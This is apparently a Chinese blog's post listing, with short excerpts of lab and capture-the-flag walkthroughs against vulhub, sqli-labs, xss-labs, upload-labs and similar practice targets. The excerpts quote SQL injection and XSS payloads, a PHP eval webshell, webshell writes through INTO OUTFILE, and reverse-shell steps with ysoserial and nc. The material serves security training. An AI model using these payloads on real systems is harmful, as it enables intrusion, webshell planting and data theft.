- 博客(50)
- 收藏
- 关注
原创 JBoss EJBInvokerServlet CVE-2013-4810 反序列化漏洞
此漏洞存在于JBoss中 /invoker/JMXInvokerServlet 路径。#监听 6666 端⼝。#创建class⽂件。
2024-09-23 18:20:56
277
原创 框架漏洞(5-rce s2-057 CVE-2017-8046 CVE-2018-1273 Shiro-550)
步骤一:环境部署步骤二:输入系统命令:/index.php?步骤三:写入webshell到1.php/index.php??>' >1.php进行访问步骤四:进行蚁剑连接。
2024-09-23 15:26:35
1171
原创 Jboss 靶场攻略
步骤一:环境搭建docker ps步骤二:POC,访问地址返回如下,说明接⼝开放,此接⼝存在反序列化漏洞步骤三:下载 ysoserial ⼯具进⾏漏洞利⽤将反弹shell进⾏base64编码步骤四:服务器设置监听得端⼝步骤五:执⾏命令反弹成功。
2024-09-22 16:11:08
801
原创 WebLogic 靶场攻略
后台弱⼝令GetShell后台弱⼝令GetShell步骤一:环境部署docker ps步骤二:漏洞复现默认账号密码:weblogic/Oracle@123步骤二:进行登录登录后台后,点击部署,点击安装,点击上载⽂件步骤三:上传war包,jsp⽊⻢压缩成zip,修改后缀为war,上传进行保存步骤四:访问部署好的war,工具连接。
2024-09-22 15:01:48
942
原创 Tomcat 靶场攻略
步骤一:环境搭建docker ps步骤二:漏洞复现步骤二:首页进行抓包Tomcat允许适⽤put⽅法上传任意⽂件类型,但不允许jsp后缀⽂件上传,因此我们需要配合 windows的步骤三:Webshell客户端⼯具进行连接。
2024-09-22 13:28:04
797
原创 aspcms webshell漏洞复现
步骤三:.在抓取的数据包中修改 slideTextStatus 字段的值为以下代码并进行发包 访问影响文件。步骤一:/admin_aspcms/login.asp访问后台,admin 123456 登录。步骤二:点击【扩展功能】【幻灯片设置】点击【保存】开启代理进行抓包。(65)))%25><%25 密码是a。
2024-09-16 14:48:52
556
原创 dedecms靶场(四种webshell姿势)
步骤一:系统-》sql命令行工具-》select '<?>'into outfile "D:/phpstudy_pro/WWW/1.php"-》确认。步骤二:点击【生成】【更新主页HTML】将主页位置修改为【./index.php】点击 【生成静态】点击 【更新主页HTML】 再次访问站点首页可发现变化。步骤一:模板-》默认模板管理-》index.htm-》修改-》添加一句话木马。步骤二:核心-》文件式管理-》文件上传-》上传一句话木马。步骤一:模块-》广告管理-》增加一个新广告。步骤二:进行蚁剑连接。
2024-09-16 13:54:20
773
原创 sqlgun靶场攻略
步骤七:扫描目录,有一个phpinfo.php文件,访问获取绝对路径。步骤八:.写入一句话木马,访问a.php。步骤六:查看账户和密码。步骤三:查看数据库名。步骤九:进行蚁剑连接。
2024-09-13 19:21:07
667
原创 RickdiculouslyEasy-CTF-综合靶场
第一个flag:命令:nmap -A -v -T4 172.16.1.7 -p 1-65535。第四个flag:利用nc远程连接60000端口,获取到了一个shell。访问/cgi-bin/tracertool.cgi。第五个flag:访问passwords。第六个flag:访问passwords。查看页面源代码得出密码:winter。第三个flag:访问13337端口。步骤一:利用Goby搜索靶机地址。第二个flag:访问9090端口。第七个flag:ftp。步骤二:访问靶机地址。图片下载用记事本打开。
2024-09-11 16:21:23
634
原创 vulhub Thinkphp5 2-rce远程代码执行漏洞
s=/Index/index/name/${@print(eval($_POST[cmd]))}cd /vulhub/thinkphp/2-rce #进入漏洞环境所在目录。s=/Index/index/L/${@phpinfo()}步骤一: 执行以下命令启动。up -d #启动靶场。ps #查看容器信息。步骤五:进行蚁剑连接。
2024-09-08 15:05:56
307
原创 vulhub spring 远程命令执行漏洞(CVE-2016-4977)
步骤三:192.168.0.107:8080/oauth/authorize?cd /vulhub/spring/CVE-2016-4977#进入漏洞环境所在目录。复制poc生成的链接,仅替换${2*2}部分,保留后面的client_id部分。CVE-2016-4977目录中运行poc 输入生成的shell。步骤一:执行以下命令启动靶场环境并在浏览器访问。
2024-09-08 14:50:15
576
原创 vulhub ThinkPHP5 5.0.23远程代码执行漏洞
步骤五:通过echo命令写入 Webshell 文件,首先将一句话木马进行Base64 编码。步骤一:.执行以下命令启动靶场环境并在浏览器访问。步骤三:/index.php?步骤七:访问shell.php。步骤四:利用HackBar。步骤六:发送POST 请求。步骤二:访问靶机环境。步骤八:进行蚁剑连接。
2024-09-08 14:29:32
422
原创 代码执行漏洞-Log4j2漏洞
步骤七:拿取JDK1.8并构造Payload且直接访问..可以看到网页被重定向到了我们的恶意类网址...步骤四:发现 /solr/admin/cores?action= 这⾥有个参数可以传。步骤三:先在自己搭建的DNSLOG平台上获取⼀个域名来监控我们注⼊的效果。步骤一:执行以下命令启动靶场环境并在浏览器访问。反弹Shell-base64加密。步骤五:反弹shell。步骤二:访问靶机地址。
2024-09-08 14:11:58
292
原创 中间件解析漏洞
步骤二:访问靶机并上传 shell.php 文件,抓包,修改⽂件后缀为.jpg,在.jpg后⾯添加两个空格并给上 .php 后缀。在x.asp中新建⼀个.txt⽂件,内容为<%=now()%> asp代码,更改后缀为jpg。步骤三:在外部浏览器进行访问Window2003的ip/x.asp/1.jpg,得出时间。步骤三:访问靶机并上传 shell.jpg 文件,文件内容为GIF89a。进行访问:/uploadfiles/lsz.php.jpg。步骤二:访问靶机并上传 lsz.php.jpg 文件,
2024-09-05 19:02:54
737
原创 Tomato靶机通关攻略
步骤四:进入antibots->info.php->右击进入页面源代码->发现存在文件包含漏洞。步骤五:页面通过image传参查看passwd文件。步骤七:将一句话木马作为ssh登录的用户名登录。得出:/antibot_image/进行访问。步骤六:页面通过image传参查看日志文件。步骤一:进行端口扫描,找寻靶机地址。步骤三:利用dirb进行扫描。步骤二:访问靶机地址。
2024-09-04 14:54:31
640
原创 pikachu文件包含漏洞靶场
步骤三:宝塔公网上创建一个6.txt文件,里面输入<?步骤四:fileinclude目录下找到php文件。php.ini ⾥有两个重要的参数。步骤五:访问php文件,蚁剑连接。步骤一:选择一个球员提交。
2024-09-03 19:47:47
594
原创 文件包含PHP伪协议利用方法 本地复现
cmd=php://input利用burp抓包。步骤二:创建123.php文件输入一句话木马。less-3 php://input协议。php.ini ⾥有两个重要的参数。php://filter协议。创建2.txt文件进行压缩。步骤三:创建1.php。
2024-09-03 19:09:10
634
原创 hackme靶机通关攻略
步骤七:更改后缀名为.jpg进行文件上传,进型burp抓包。访问/upload/1.php后进行蚁剑连接。步骤五:在书名后进行sql漏洞注入。步骤四:输入书名进行burp抓包。查询user,pasword信息。利用superadmin进行登录。更改文件名后缀为.php进行放包。步骤六:编写1.php木马文件。步骤二:访问搜索地址。步骤三:注册账号密码。
2024-09-03 18:14:17
346
原创 sqli-labs靶场通关攻略 61-65
步骤一:闭合方式:?id=1')) --+步骤三:查出网站的数据库表名。步骤四:查出users表列名。第六一关 less-61。第六二关 less-62。第六三关 less-63。第六四关 less-64。第六五关 less-65。步骤五:获取目标信息。输入登录框,提交成功。
2024-09-02 15:32:18
442
原创 sqli-labs靶场通关攻略 56-60
步骤一:闭合方式:?id=1')-- +步骤一:闭合方式:?id=1") --+步骤三:联合查询 查出网站的数据库表名。步骤四:联合查询 查出users表列名。步骤一:闭合方式:?步骤三:联合查询 查出网站的数据库表名。步骤四:联合查询 查出users表列名。步骤一:闭合方式:?步骤一:闭合方式:?步骤三:查出网站的数据库表名。步骤四:查出users表列名。步骤三:查出网站的数据库表名。步骤四:查出users表列名。步骤三:查出网站的数据库表名。步骤四:查出users表列名。第五六关 less-56。
2024-09-02 10:46:02
786
原创 upload-labs靶场通关(附靶场环境)
步骤一:上传1.php文件抓包,将/upload/后面添加随便一个php文件%00,1.php改为1.jpg 放行。步骤一:上传1.php文件抓包,将/upload/后面添加随便一个php文件加空格,1.php改为1.jpg。步骤一:图片需要二次渲染,上传图片,图片右键新建标签页打开图片,打开文件包含漏洞,用file读取图片地址。步骤一:上传shell.jpg,图片右键新建标签页打开图片,打开文件包含漏洞,用file读取图片地址。步骤一:上传1.php文件抓包,1.php后面加.空格. 放行。
2024-09-01 11:41:40
1241
原创 sqli-labs靶场通关攻略 51-55
用ascii码截取数据库的第一位字符 判断第一位字符的ascii码是否大于114 页面延迟三秒访问 说明数据库第一位字符ascii码大于114。sort=1' and if((ascii(substr(database(),1,1))>115),sleep(3),1)--+sort=1 and if((ascii(substr(database(),1,1))>115),sleep(3),1)步骤三:联合查询 查出网站的数据库表名。步骤三:联合查询 查出网站的数据库表名。步骤一:利用时间盲注查询数据库。
2024-08-30 16:04:23
1178
原创 sqli-labs靶场通关攻略 46-50
判断数据库第一位字符的ascii码是否大于115 页面正常显示 说明不大于 大于114不大于115 说明第一位字符ascii码等于115。sort=1' and if((ascii(substr(database(),1,1))>115),sleep(3),1)--+sort=1 and if((ascii(substr(database(),1,1))>115),sleep(3),1)步骤一:利用时间盲注查询数据库。步骤一:利用报错注入查询库。步骤一:利用报错注入查询库。步骤一:利用报错注入查询库。
2024-08-29 18:58:08
2512
原创 vulhub xxe靶机
步骤六:进入/xxe/admin.php输入用户名:administhebest 密码:admin@123。步骤五:输入用户名密码,利用burp抓包,传送至重放器。步骤二:利用dirsearsh扫描目录。步骤八:在www目录下添加php文件。进行base64解码有用户名密码。得出Flag进行base32解码。得出结果进行base64解码。访问本机php文件,得出结果。进入robots.txt。步骤一:搜索靶机地址。步骤四:访问/xxe。进行base64解码。进行base64解码。
2024-08-29 18:00:29
1232
原创 sqli-labs靶场通关攻略 41-45
密码框输入:') and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database() ),0x7e),1) -- aaa。密码框输入:') and updatexml(1,concat(0x7e,(select database()),0x7e),1) -- aaa。步骤四:查看users表列名。步骤四:查看users表列名。
2024-08-28 19:03:36
2345
原创 xss-labs通关攻略 16-20关
keyword=<img%0asrc="1.jpg"%0aonerror=alert(1)>19-20关需要flash插件,本文章就不描述了,想做请去访问大佬文章。第十六关:less-16。第十七关:less-17。第十八关:less-18。第十九关:less-19。第二十关:less-20。
2024-08-28 17:58:58
199
原创 ctfhub-web-SSRF(FastCGI协议-DNS重绑定 Bypass)
步骤二:对一句话木马进行base64编码:<?输入:url=http://0x7f000001/flag.php。访问url=http://127.0.0.1/flag.php。访问url=http://127.0.0.1/flag.php。访问url=http://127.0.0.1/flag.php。less-6 FastCGI协议。步骤一:开启环境,查看提示。步骤一:开启环境,查看提示。步骤一:开启环境,查看提示。步骤一:开启环境,查看提示。步骤一:开启环境,查看提示。步骤一:开启环境,查看提示。
2024-08-28 14:46:30
885
原创 xss-labs通关攻略 11-15关
步骤二:修改User Agent:click me!" type="button" onmouseover="alert(/xss/)进行放包。步骤二:修改Cookie: user=click me!" type="button" onmouseover="alert(/xss/)" type="button" onmouseover="alert(/xss/)进行放包。name='步骤一:利用burp抓包。步骤一:利用burp抓包。
2024-08-27 19:03:41
578
原创 sqli-labs靶场通关攻略 36-40
主页有通关攻略 1-35第三六关 less-36宽字节注入步骤一:闭合方式?步骤二:查看数据库名步骤三:查看表名步骤四:查看users表中列名步骤五:查看信息第三七关 less-37步骤一:输入Username:admin Password:admin 利用Burp抓包步骤二:查看数据库步骤三:查看表名步骤四:查看users表中列名步骤五:查看users表中信息第三八关 less-38步骤一:闭合方式?id=1' --+步骤二:查询数据库?步骤三:查看表名?
2024-08-27 18:09:20
1181
原创 ctfhub-web-SSRF(内网访问-上传文件)
步骤六:新建文本文档,将其中的 %0A 替换成 %0d%0A 并且末尾要加上 %0d%0a。步骤二:输入url=file:///var/www/html/flag.php。步骤二:输入url=http://127.0.0.1:8000进行抓包。步骤二:输入url=http://127.0.0.1/flag.php。步骤二:输入url=http://127.0.0.1/flag.php。将其中的 %0A 替换成 %0d%0A 并且末尾要加上 %0d%0a。步骤一:开启环境,查看提示。
2024-08-27 16:32:50
773
原创 sqli-labs靶场通关攻略 31-35
步骤一:输入Username:admin Password:admin 利用Burp抓包。步骤一:查询闭合方式?id=1%df' --+步骤一:查询闭合方式?id=1%df' --+id=1&id=1 ") --+步骤四:查看users表中列名。步骤四:查看users表中列名。步骤三:查看users表中列名。步骤四:查询users表中列名。步骤五:查看users表中信息。步骤三:查询users表中列名。第三三关 less-33。步骤二:查看数据库名。步骤一:查看数据库名。步骤二:查看数据库名。
2024-08-26 19:23:45
2114
原创 xss-labs通关攻略 6-10关
<a href=javascript:alert()> j链接不合法。步骤一:" sRc DaTa OnFocus <sCriPt> <a hReF=javascript:alert()> j。步骤二:大小写绕过"> <sCript>alert()</sCript> <"步骤一:输入 <script>alert(1)</script>步骤一:输入 <script>alert(1)
2024-08-26 18:45:47
378
原创 sqli-labs靶场通关攻略 26-30
主页有通关攻略 1-25第二六关 less-26步骤一:输入?id=1 发现逻辑运算符,注释符以及空格给过滤了步骤二:?id=1 and'闭合,转换:逻辑运算符使用双写或者&&和||替换,空格用括号替换步骤三:查询数据库名步骤四:查看表名步骤五:查看users表中的列名步骤六:查看信息第二七关 less-27步骤一:过滤了空格,select和union大小写绕过,%09代替空格查数据库步骤二:查看表名步骤三:查看users表中列名。
2024-08-25 14:22:54
1085
原创 xss-labs通关攻略 1-5关(附靶场环境)
alert(1)</script> 没有结果。步骤三:闭合">然后输入"><script>alert(1)</script>步骤一:输入<script>alert(1)</script>步骤一:输入<script>alert(1)</script>步骤一:输入<script>alert(1)</script>步骤一:输入<script>alert(1)</script>步骤一:输入<script>alert(1)
2024-08-25 13:43:20
534
原创 pikachu靶场XXS通关攻略
alert(1)</script>没有弹窗,点击F12进行查看。<script>alert(1)</script>,F12打开控制台。输入'<script>alert(1)</script>没有弹窗。输入'<sCript>alert(1)</sCript>输入<script>alert(1)</script>输入<script>alert(1)</script>输入<script>alert(1)</script>输入<script>alert(1)
2024-08-22 19:56:11
395
原创 sqli-labs靶场通关攻略 21-25
代码:') union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' #代码:') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' #
2024-08-22 19:08:10
1191
原创 sqli-labs靶场通关攻略 16-20
步骤一:利用Burp Suite抓包 username:admin password:admin抓到数据发送打Repeater。步骤一:利用Burp Suite抓包 username:admin password:admin抓到数据发送打Repeater。步骤一:利用Burp Suite抓包 username:admin password:admin抓到数据发送打Repeater。步骤一:判断闭合方式为admin") and 1=1#步骤二:在passwd=admin后输入'报错。
2024-08-21 19:43:14
1026
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人